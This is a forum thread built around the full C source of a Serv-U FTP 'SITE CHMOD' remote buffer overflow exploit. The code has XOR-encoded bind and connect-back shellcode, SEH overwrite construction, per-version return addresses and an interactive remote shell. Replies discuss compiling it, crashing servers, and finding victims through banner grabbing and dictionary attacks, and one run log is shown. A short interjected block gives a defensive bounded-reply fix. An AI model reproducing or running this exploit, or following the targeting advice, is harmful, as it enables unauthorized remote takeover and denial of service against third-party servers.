"\xA3\xC2\x6C\xC5\x97\x18\x5F\xF9\x6C\x6C\xA2\x6C\xC5\x9B\xC0\x6C"
"\xC5\xB7\x6C\xC5\x9F\xC2\xC5\x18\xE6\xAF\x18\xE7\xBD\xEB\x90\x66"
"\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA\xD2\x3E\x90\x56\xA0\x48\x9C"
"\x2D\x83\xA9\x45\xE7\x9B\x52\x58\x9E\x90\x49\xD3\x78\x62\xA8\x8C"
"\xE6\x74\xCD\x18\xCD\xB7\x90\x4E\xF5\x18\x9F\xD8\x18\xCD\x8F\x90"
"\x4E\x18\x97\x18\x90\x56\x38\xCD\xCA\x50\x7B\x65\x6D\x6C\x6C\x1D"
"\xDD\x9D\x7F\xE1\x6D\x20\x85\x3E\x4A\x96\x5D\xED\x4B\x71\xE0\x58"
"\x7E\x6F\xA8\x4A\x9A\x66\x3E\x37\x89\xE3\x54\x37\x3E\xBD\x7A\x76"
"\xDA\x15\xDA\x74\xEA\x55\xEA";

// 294 bytes connectback shellcode by lion (xor with 0x93)
unsigned char cbsc[]=
"\x7A\x6F\x93\x93\x93\xCC\xF7\x32\xA3\x93\x93\x93\x18\xD3\x9F\x18"
"\xE3\x8F\x3E\x18\xFB\x9B\x18\x64\xF9\x97\xCA\x7B\x0F\x93\x93\x93"
"\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC\xC7\x6C\x85\x18"
"\x7B\xF9\x97\xCA\x7B\x10\x93\x93\x93\x71\x6A\x12\x7F\x03\x92\x93"
"\x93\xC7\xFB\x92\x92\x93\x93\x6C\xC5\x83\xC3\xC3\xC3\xC3\xF9\x92"
"\xF9\x91\x6C\xC5\x87\x18\x4B\xFB\xEC\x93\x93\x92\xFB\x91\x93\x93"
"\xA6\x18\x5F\xF9\x83\xC2\xC0\x6C\xC5\x8B\x16\x53\xE6\xD8\xA0\x53"
"\xFB\xF0\xFE\xF7\x93\x1A\xF5\xA3\x10\x7F\xC7\x18\x6F\xF9\x83\xCA"
"\x1A\x97\x1C\x71\x68\x55\xD4\x83\xD7\x6D\xD4\xAF\x6D\xD4\xAE\x1A"
"\xCC\xDB\x1A\xCC\xDF\x1A\xCC\xC3\x1E\xD7\xB7\x83\xC4\xC3\xC2\xC2"
"\xC2\xF9\x92\xC2\xC2\x6C\xE5\xA3\xC2\x6C\xC5\x97\x18\x5F\xF9\x6C"
"\x6C\xA2\x6C\xC5\x9B\xC0\x6C\xC5\x8F\x6C\xC5\x9F\xC2\xC5\x18\xE6"
"\xAF\x18\xE7\xBD\xEB\x90\x66\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA"
"\xD2\x3E\x90\x56\xA0\x48\x9C\x2D\x83\xA9\x45\xE7\x9B\x52\x58\x9E"
"\x90\x49\xD3\x78\x62\xA8\x8C\xE6\x74\xCD\x18\xCD\xB7\x90\x4E\xF5"
"\x18\x9F\xD8\x18\xCD\x8F\x90\x4E\x18\x97\x18\x90\x56\x38\xCD\xCA"
"\x50\x7B\x6C\x6D\x6C\x6C\x1D\xDD\x9D\x7F\xE1\x6D\x20\x85\x3E\x4A"
"\x96\x5D\xED\x4B\x71\xE0\x58\x7E\x6F\xA8\x4A\x9A\x66\x3E\x7F\x6A"
"\x39\xF3\x74\xEA\x55\xEA";

void usage(char *p)
{
    int    i;
    printf( "Usage:\t%s\t<-i ip> <-t type>\n"
        "\t\t[-u user] [-p pass] [-d dir]\n"
        "\t\t[-f ftpport] [-c cbhost] [-s shellport]\n\n"
        "[type]:\n" , p);   
    for(i=0;i<sizeof(targets)/sizeof(v);i++)
    {
        printf("\t%d\t0x%x\t%s\n", i, targets[i].dwJMP, targets[i].szDescription);
    }
}

/* ripped from TESO code and modifed by ey4s for win32 */
void shell (int sock)
{
    int l;
    char buf[512];
    struct    timeval time;
    unsigned long    ul[2];

    time.tv_sec = 1;
    time.tv_usec = 0;

    while (1)
    {
        ul[0] = 1;
        ul[1] = sock;

        l = select (0, (fd_set *)&ul, NULL, NULL, &time);
        if(l == 1)
        {
            l = recv (sock, buf, sizeof (buf), 0);
            if (l <= 0)
            {
                printf ("[-] Connection closed.\n");
                return;
            }
            l = write (1, buf, l);
            if (l <= 0)
            {
                printf ("[-] Connection closed.\n");
                return;
            }
        }
        else
        {
            l = read (0, buf, sizeof (buf));
            if (l <= 0)
            {
                printf("[-] Connection closed.\n");
                return;
            }
            l = send(sock, buf, l, 0);
            if (l <= 0)
            {
                printf("[-] Connection closed.\n");
                return;
            }
        }
    }
}

void main(int argc, char **argv)
{
    struct    sockaddr_in sa, server, client;
    WSADATA    wsd;
    SOCKET    s, s2, s3;
    int    iErr, ret, len;
    char    szRecvBuff[MAX_LEN];
    int    i, j, iType;
    int    iPort=21;
    char    *ip=NULL, *pUser="ftp", *pPass="ftp@ftp.com", *cbHost=NULL;
    char    user[128], pass[128];
    BOOL    bCb=FALSE, bLocal=TRUE;
    unsigned short    shport=53, shport2=0;
    unsigned long    cbip;
    unsigned int    timeout=5000, Reuse;
    char    penetrate[255],cbHost2[20];
    int seh_offset;
   
    printf( "Serv-U FTPD 3.x/4.x \"SITE CHMOD\" remote overflow exploit V%s\r\n"
        "Bug found by kkqq kkqq@0x557.org, Code By lion (lion@cnhonker.net)\r\n"
        "Welcome to HUC website http://www.cnhonker.com\;r\n\n"
             , VERSION);

    seh_offset = SEH_OFFSET;
   
    if(argc < 4)
    {
        usage(argv[0]);
        return;
    }

    for(i=1;i<argc;i+=2)
    {
        if(strlen(argv[i]) != 2)
        {
            usage(argv[0]);
            return;
        }
        // check parameter
        if(i == argc-1)
        {
            usage(argv[0]);
            return;
        }
        switch(argv[i][1])
        {
            case 'i':
                ip=argv[i+1];
                break;
            case 't':
                iType = atoi(argv[i+1]);
                break;
            case 'f':
                iPort=atoi(argv[i+1]);
                break;
            case 'p':
                pPass = argv[i+1];
                break;
            case 'u':
                pUser=argv[i+1];
                break;
            case 'c':
                cbHost=argv[i+1];
                bCb=TRUE;
                break;
            case 's':
                shport=atoi(argv[i+1]);
                break;
            case 'd':
                if(argv[i+1][0] != '/')
                    strcpy(szDirectory, "/");
                strncat(szDirectory, argv[i+1], sizeof(szDirectory)-0x20);
               
                if(szDirectory[strlen(szDirectory)-1] != '/')
                    strcat(szDirectory, "/");
                   
                // correct the directory len
                for(j=0;j<(strlen(szDirectory)-1)%8;j++)
                    strcat(szDirectory, "x");
                   
                printf("%d:%s\r\n", strlen(szDirectory), szDirectory);
                seh_offset = seh_offset - strlen(szDirectory)+1;
                break;
        }
    }

    if((!ip) || (!user) || (!pass))
    {
        usage(argv[0]);
        printf("[-] Invalid parameter.\n");
        return;
    }

    if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
    {
        usage(argv[0]);
        printf("[-] Invalid type.\n");
        return;
    }

    if(iPort <0 || iPort >65535 || shport <0 || shport > 65535)
    {
        usage(argv[0]);
        printf("[-] Invalid port.\n");
        return;
    }
   
    _snprintf(user, sizeof(user)-1, "USER %s\r\n", pUser);
    user[sizeof(user)-1]='\0';
    _snprintf(pass, sizeof(pass)-1, "PASS %s\r\n", pPass);
    pass[sizeof(pass)-1]='\0';
    szSend[0] = user;    //user
    szSend[1] = pass;    //pass   
    szSend[2] = penetrate;    //pentrate
    szSend[3] = szCommand;    //shellcode
   
    // Penetrate through the firewall.
    if(bCb && shport > 1024)
    {
        strncpy(cbHost2, cbHost, 20);
        for(i=0;i<strlen(cbHost); i++)
        {
            if(cbHost[i] == '.')
                cbHost2[i] = ',';
        }
       
        sprintf(penetrate, "PORT %s,%d,%d\r\n", cbHost2, shport/256, shport%256);

        //printf("%s", penetrate);
    }
    else
    {
        sprintf(penetrate,"TYPE I\r\n");       
    }

    // fill the "site chmod" command
    strcpy(szCommand, "site chmod 777 ");
   
    // fill the directory
    if(szDirectory[0])
        strcat(szCommand, szDirectory);

    // fill the egg
    for(i=0;i<seh_offset%8;i++)
        strcat(szCommand, "\x90");
    //strcat(szCommand, "BBBB");
   
    // fill the seh
    for(i=0;i<=(seh_offset/8)*8+0x20;i+=8)
    {
        strcat(szCommand, JMP_OVER);
        memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4);
    }
       
    // fill the decode
    strcat(szCommand, decode);

    // fill the shellcode start    sign
    strcat(szCommand, sc_start);

    // fill the shellcode
    if(bCb)
    {
        // connectback shellcode
        shport2 = htons(shport)^(u_short)0x9393;
        cbip = inet_addr(cbHost)^0x93939393;
        memcpy(&cbsc[PORT_OFFSET], &shport2, 2);
        memcpy(&cbsc[IP_OFFSET], &cbip, 4);
        strcat(szCommand, cbsc);       
    }
    else
    {
        // bind shellcode
        shport2 = htons(shport)^(u_short)0x9393;
        memcpy(&sc[BIND_OFFSET], &shport2, 2);
        strcat(szCommand, sc);
    }

    // fill the shellcode end sign
    strcat(szCommand, sc_end);

    // send end
    strcat(szCommand, "\r\n");

    if(strlen(szCommand) >= sizeof(szCommand))
    {
        printf("[-] stack buffer overflow.\n");
        return;
    }
   
//    printf("send size %d:%s", strlen(szCommand), szCommand);
   
    __try
    {
        if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
        {
            printf("[-] WSAStartup error:%d\n", WSAGetLastError());
            __leave;
        }

        s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(s == INVALID_SOCKET)
        {
            printf("[-] Create socket failed:%d",GetLastError());
            __leave;
        }

        sa.sin_family=AF_INET;
        sa.sin_port=htons((USHORT)iPort);
        sa.sin_addr.S_un.S_addr=inet_addr(ip);

        setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
        iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa));
        if(iErr == SOCKET_ERROR)
        {
            printf("[-] Connect to %s:%d error:%d\n", ip, iPort, GetLastError());
            __leave;
        }
        printf("[+] Connect to %s:%d success.\n", ip, iPort);
       
        if(bCb)
        {
            Sleep(500);
            s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

            server.sin_family=AF_INET;
            server.sin_addr.S_un.S_addr=inet_addr(cbHost);
            //server.sin_addr.s_addr=INADDR_ANY;
            server.sin_port=htons((unsigned short)shport);

            setsockopt(s2,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));

            Reuse = 1;
            setsockopt(s2, SOL_SOCKET, SO_REUSEADDR, (char*)&Reuse, sizeof(Reuse));

            if(bind(s2,(LPSOCKADDR)&server,sizeof(server))==SOCKET_ERROR)
            {
                printf("[-] Bind port on %s:%d error.\n", cbHost, shport);
                printf("[-] You must run nc get the shell.\n");
                bLocal = FALSE;
                //closesocket(s2);
                //__leave;
            }
            else
            {   
                printf("[+] Bind port on %s:%d success.\n", cbHost, shport);
                listen(s2, 1);
            }
        }
       
        for(i=0;i<sizeof(szSend)/sizeof(szSend[0]);i++)
        {
            memset(szRecvBuff, 0, sizeof(szRecvBuff));
            iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0);
            if(iErr == SOCKET_ERROR)
            {
                printf("[-] Recv buffer error:%d.\n", WSAGetLastError());
                __leave;
            }
            printf("[+] Recv: %s", szRecvBuff);
           
            if(szRecvBuff[0] == '5')
            {
                printf("[-] Server return a error Message.\r\n");
                __leave;
            }

            iErr = send(s, szSend[i], strlen(szSend[i]),0);
            if(iErr == SOCKET_ERROR)
            {
                printf("[-] Send buffer error:%d.\n", WSAGetLastError());
                __leave;
            }

            if(i==sizeof(szSend)/sizeof(szSend[0])-1)
                printf("[+] Send shellcode %d bytes.\n", iErr);
            else
                printf("[+] Send: %s", szSend[i]);
        }

        printf("[+] If you don't have a shell it didn't work.\n");

        if(bCb)
        {
            if(bLocal)
            {
                printf("[+] Wait for shell...\n");
           
                len = sizeof(client);
                s3 = accept(s2, (struct sockaddr*)&client, &len);
                if(s3 != INVALID_SOCKET)
                {
                    printf("[+] Exploit success! Good luck! :)\n");
                    printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
                    shell(s3);
                }
            }   
        }
        else
        {
            printf("[+] Connect to shell...\n");
           
            Sleep(1000);
            s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
            server.sin_family = AF_INET;
            server.sin_port = htons(shport);
            server.sin_addr.s_addr=inet_addr(ip);

            ret = connect(s2, (struct sockaddr *)&server, sizeof(server));
            if(ret!=0)
            {
                printf("[-] Exploit seem failed.\n");
                __leave;
            }
           
            printf("[+] Exploit success! Good luck! :)\n");
            printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
            shell(s2);
        }
       
       
    }

    __finally
    {
        if(s != INVALID_SOCKET) closesocket(s);
        if(s2 != INVALID_SOCKET) closesocket(s2);
        if(s3 != INVALID_SOCKET) closesocket(s3);
        WSACleanup();
    }

    return;
}


QUOTE

Serv-U FTPD 3.x/4.x "SITE CHMOD" remote overflow exploit V1.0
Bug found by kkqq kkqq@0x557.org, Code By lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com;r

Usage:  C:\Exploits\suxpl.exe   <-i ip> <-t type>
                [-u user] [-p pass] [-d dir]
                [-f ftpport] [-c cbhost] [-s shellport]

[type]:
        0       0x7ffa4a1b      Serv-U v3.0.0.20~v4.1.0.11 GB 2K/XP ALL
        1       0x7ffa2186      Serv-U v3.0.0.20~v4.1.0.11 BG 2K/XP ALL
        2       0x6dee6713      Serv-U v3.0.0.20~v4.1.0.11 KR 2K SP4
        3       0x77886713      Serv-U v3.0.0.20~v4.1.0.11 EN 2K SP4
        4       0x76b42a3a      Serv-U v3.0.0.20~v4.1.0.11 EN XP SP1
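For anyone patching or auditing code with this pattern: the advisory at the top of the thread attributes the crash to an unbounded sprintf of the filename into a 256-byte reply buffer. The following is an added example, not code from Serv-U or from any poster here, showing a bounded version of that reply formatting; the function names and the fallback reply text are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define REPLY_MAX 256  /* reply buffer size stated in the advisory */

/* Hypothetical handler helper (name is an assumption): formats the
 * "no such file" reply with an explicit bound. Returns 0 when the full
 * reply fits, -1 when it would not; dst is always NUL-terminated. */
int format_nofile_reply(char *dst, size_t dstlen, const char *filename)
{
    int n;

    if (dst == NULL || dstlen == 0 || filename == NULL)
        return -1;

    /* snprintf never writes more than dstlen bytes and returns the
     * length the complete string would have needed. */
    n = snprintf(dst, dstlen, "%s: No such file or directory.", filename);
    if (n < 0 || (size_t)n >= dstlen) {
        /* Do not send back a truncated echo of client-supplied data;
         * the fallback text is illustrative. */
        snprintf(dst, dstlen, "550 Filename too long.");
        return -1;
    }
    return 0;
}

/* Constructed input: a filename of n 'A' bytes, like the crash test
 * described in the thread. Returns the helper's result code. */
int reply_for_length(size_t n)
{
    char name[1024];
    char reply[REPLY_MAX];

    if (n >= sizeof(name))
        n = sizeof(name) - 1;
    memset(name, 'A', n);
    name[n] = '\0';
    return format_nofile_reply(reply, sizeof(reply), name);
}

int main(void)
{
    printf("10 bytes  -> %d\n", reply_for_length(10));
    printf("300 bytes -> %d\n", reply_for_length(300));
    return 0;
}
```

The fixed suffix is 28 bytes, so the longest filename that still fits in the 256-byte buffer with its terminator is 227 bytes.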
BlackBoard
I also got errors with 4 C++ compiler programs, what's my mistake?
why do you just post the sourcecode and not the exe file?
TheOther
I've got no problem to compile it under ms C++.

Next problem is to find targets and to find the OS.

To find some, I will try to get the banners on port 21 and then do a dict-attack to grant access.

But what can we use to find out what kind of OS-edition they are using?

Or do you know better ways to find targets?
Planquadrat
@BlackBoard

Sorry, but I don't think it's a good idea to post a DL link here for the .exe file, because (maybe) too many kiddies will take it for rehacking, and even if you don't get a shell with this sploit the server is crashed 100%, and that is not in my interest.
SkyRaVeR
yeah - think so, too... kiddies who don't know @least how 2 compile shut not rehaXX ! no .exe from my side - btw. th@nx for the servu3/4 thingie... worXX fine 4 me !
Nexcess
QUOTE (SkyRaVeR @ Jan 26 2004, 11:40 PM)
yeah - think so, too... kiddies who don't know @least how 2 compile shut not rehaXX ! no .exe from my side - btw. th@nx for the servu3/4 thingie... worXX fine 4 me !

Because yeah, people who can't type in plain English are nowhere near as bad off as people who can't get something compiled.

heh...

vnet576
What he's saying is that you should not be breaking into other people's machines if you can't even understand the code. And don't bullshit me and say that you're gonna use this on your own server... you don't need the exploit w/ shell to audit your server... the regular POC should suffice.
Train25
QUOTE (vnet576 @ Jan 26 2004, 08:10 PM)
What he's saying is that you should not be breaking into other people's machines if you can't even understand the code. And don't bullshit me and say that you're gonna use this on your own server... you don't need the exploit w/ shell to audit your server... the regular POC should suffice.

I think it's time to close registration and clean the board of all the script kiddies. Nothing ticks me off more than having to read through script kiddy comments asking to have it compiled and handed to them on a silver platter. If they don't know how to compile their own code then they should just stop typing until they have something interesting to say.

That's my rant for the week
Nexcess
QUOTE

I think it's time to close registration and clean the board of all the script kiddies.


Cool! Can we purge the egomaniacs too? Not everyone has time to learn a second or third language. Even if they try, you can't just pick up a 'learn c in 24 hours' book and be coder of the year tomorrow.




edit: what's bad? this is bad

88 replies
Attached File ( Number of downloads: 808 ) <--- random example

I'll take the 'script kids' over the leechers any day who can't even be troubled to say thank you.
Sw0rdfish
Got it compiled, right!! But no shellcode is spawned on port 53 >_<
Only crashes the servu (Tested on my computer)
Copkill
I have compiled it but get no shell

[+] Connect to xxx.xx.xx.172:666 success.
[-] Bind port on xx.xx.xx.xxx:53 error. <----error ???
[-] You must run nc get the shell.
[+] Recv: 220 ready...
[+] Send: USER Cop
[+] Recv: 331 User name okay, need password.
[+] Send: PASS Cop
[+] Recv: 230 User logged in, proceed.
[+] Send: TYPE I
[+] Recv: 200 Type set to I.
[+] Send shellcode 791 bytes.
[+] If you don't have a shell it didn't work.
